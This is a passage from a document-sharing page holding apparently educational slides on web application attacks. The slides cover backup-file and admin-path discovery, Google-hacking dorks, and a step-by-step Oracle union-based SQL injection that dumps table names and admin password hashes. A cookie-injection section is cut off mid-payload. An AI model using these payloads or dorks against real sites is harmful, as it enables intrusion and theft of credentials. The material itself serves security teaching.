- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
WEB应用威胁——信息泄漏攻击(2) 数据库连接的备份文件 db.inc.bak Global.asa.bak Config.asp.bak Conn.asp.bak …… 代码备份文件 .asp.bak .asp.1 www.rar Web.tar.gz backup.sql web.config.bak … 常用目录名和文件名 /admin/ /backup/ /manage/ …… admin.asp login.php Admin_login.jsp …… GoogleHacking 什么是GoogleHacking Google Hacking是一种利用搜索引擎获取web应用程序弱点和敏感信息的手段。 Google Hacking 是一种以合法的方式获取非法或未授权信息的手段 Google Hacking 是所有利用搜索引擎进行攻击的一个典型 基本搜索 + 把google可能忽略的字列如查询范围 - 把某个字忽略 ~ 同意词 . 单一的通配符 * 通配符,可代表多个字母 精确查询 高级搜索 intext 把网页中的正文内容中的某个字符做为搜索条件 intitle 搜索网页标题中某个字符做为搜索条件 cache 搜索google里关于某些内容的缓存 iletype 搜索指定类型的文件(重要参数) inurl 搜索我们指定的字符是否存在于URL中 site 搜索指定的网站或者域名 GoogleHacking实例 .cn filetype:inc filetype:mdb inurl:database filetype:mdb Standard Jet DB“ 该站已经被入侵,HYTOP.MDB 是个木马打包源代码后的生成文件 访问控制错误漏洞 漏洞介绍 敏感目录或者敏感文件权限设置不当导致被攻击者查看 漏洞成因 WEB程序权限设置不严格 WEB程序服务器权限设置不当 字段猜解 猜解字段数量并构造查询语句 And%201=1%20union%20select%20null,null,null,null,null,null,null,null,null,null from dual—页面返回正常,查询语句语法正确 检测字段类型and%201=1%20union%20select%20null,null,‘null’,’null’,null,null,‘null’,’null’,‘null’,’null’%20from%20dual—在第3 ,4,7,8,9,10位置加上 单引号均返回正常页面,字段是字符型 查询ORACLE数据库的版本 and%20%201=2%20union%20select%20null,null,(select%20banner%20from%20sys.v_$version%20where%20rownum=1),null,null,null,null,null,null,null%20from%20dual-- 查询当前连接用户 and%20%201=2%20union%20select%20null,null,(select%20SYS_CONTEXT%20(USERENV,%20CURRENT_USER)%20from%20dual),null,null,null,null,null,null,null%20from%20dual--—爆出当前连接用户为TOUR 查询数据库中所有表名 and%20%201=2%20union%20select%20null,null,TABLE_NAME,null,null,null,null,null,null,null%20from%20USER_TABLES--成功获取表名 其中敏感表名包括ADMIN ABOUT CONFIG MASTER 查询字段 and%20%201=2%20union%20select%20null,null,name,null,null,null,null,null,null,null%20from%20master--获取ADMIN中的用户名 and%20%201=2%20union%20select%20null,null,password,‘null’,null,null,‘null’,‘null’,‘null’,‘null’%20from%20master--获取ADMIN中的管理密码,MD5加密 查找后台登陆地址 使用得到的密码成功登陆 SQL注入攻击过程演示(2) cookie注入 发现注入点 发现产品展示的详细信息的URL链接,在cookie里提交单引号立即报错 在cookie里用%20AnD%208808%3D8808;测试返回正常,用%20AnD%2088
原创力文档


文档评论(0)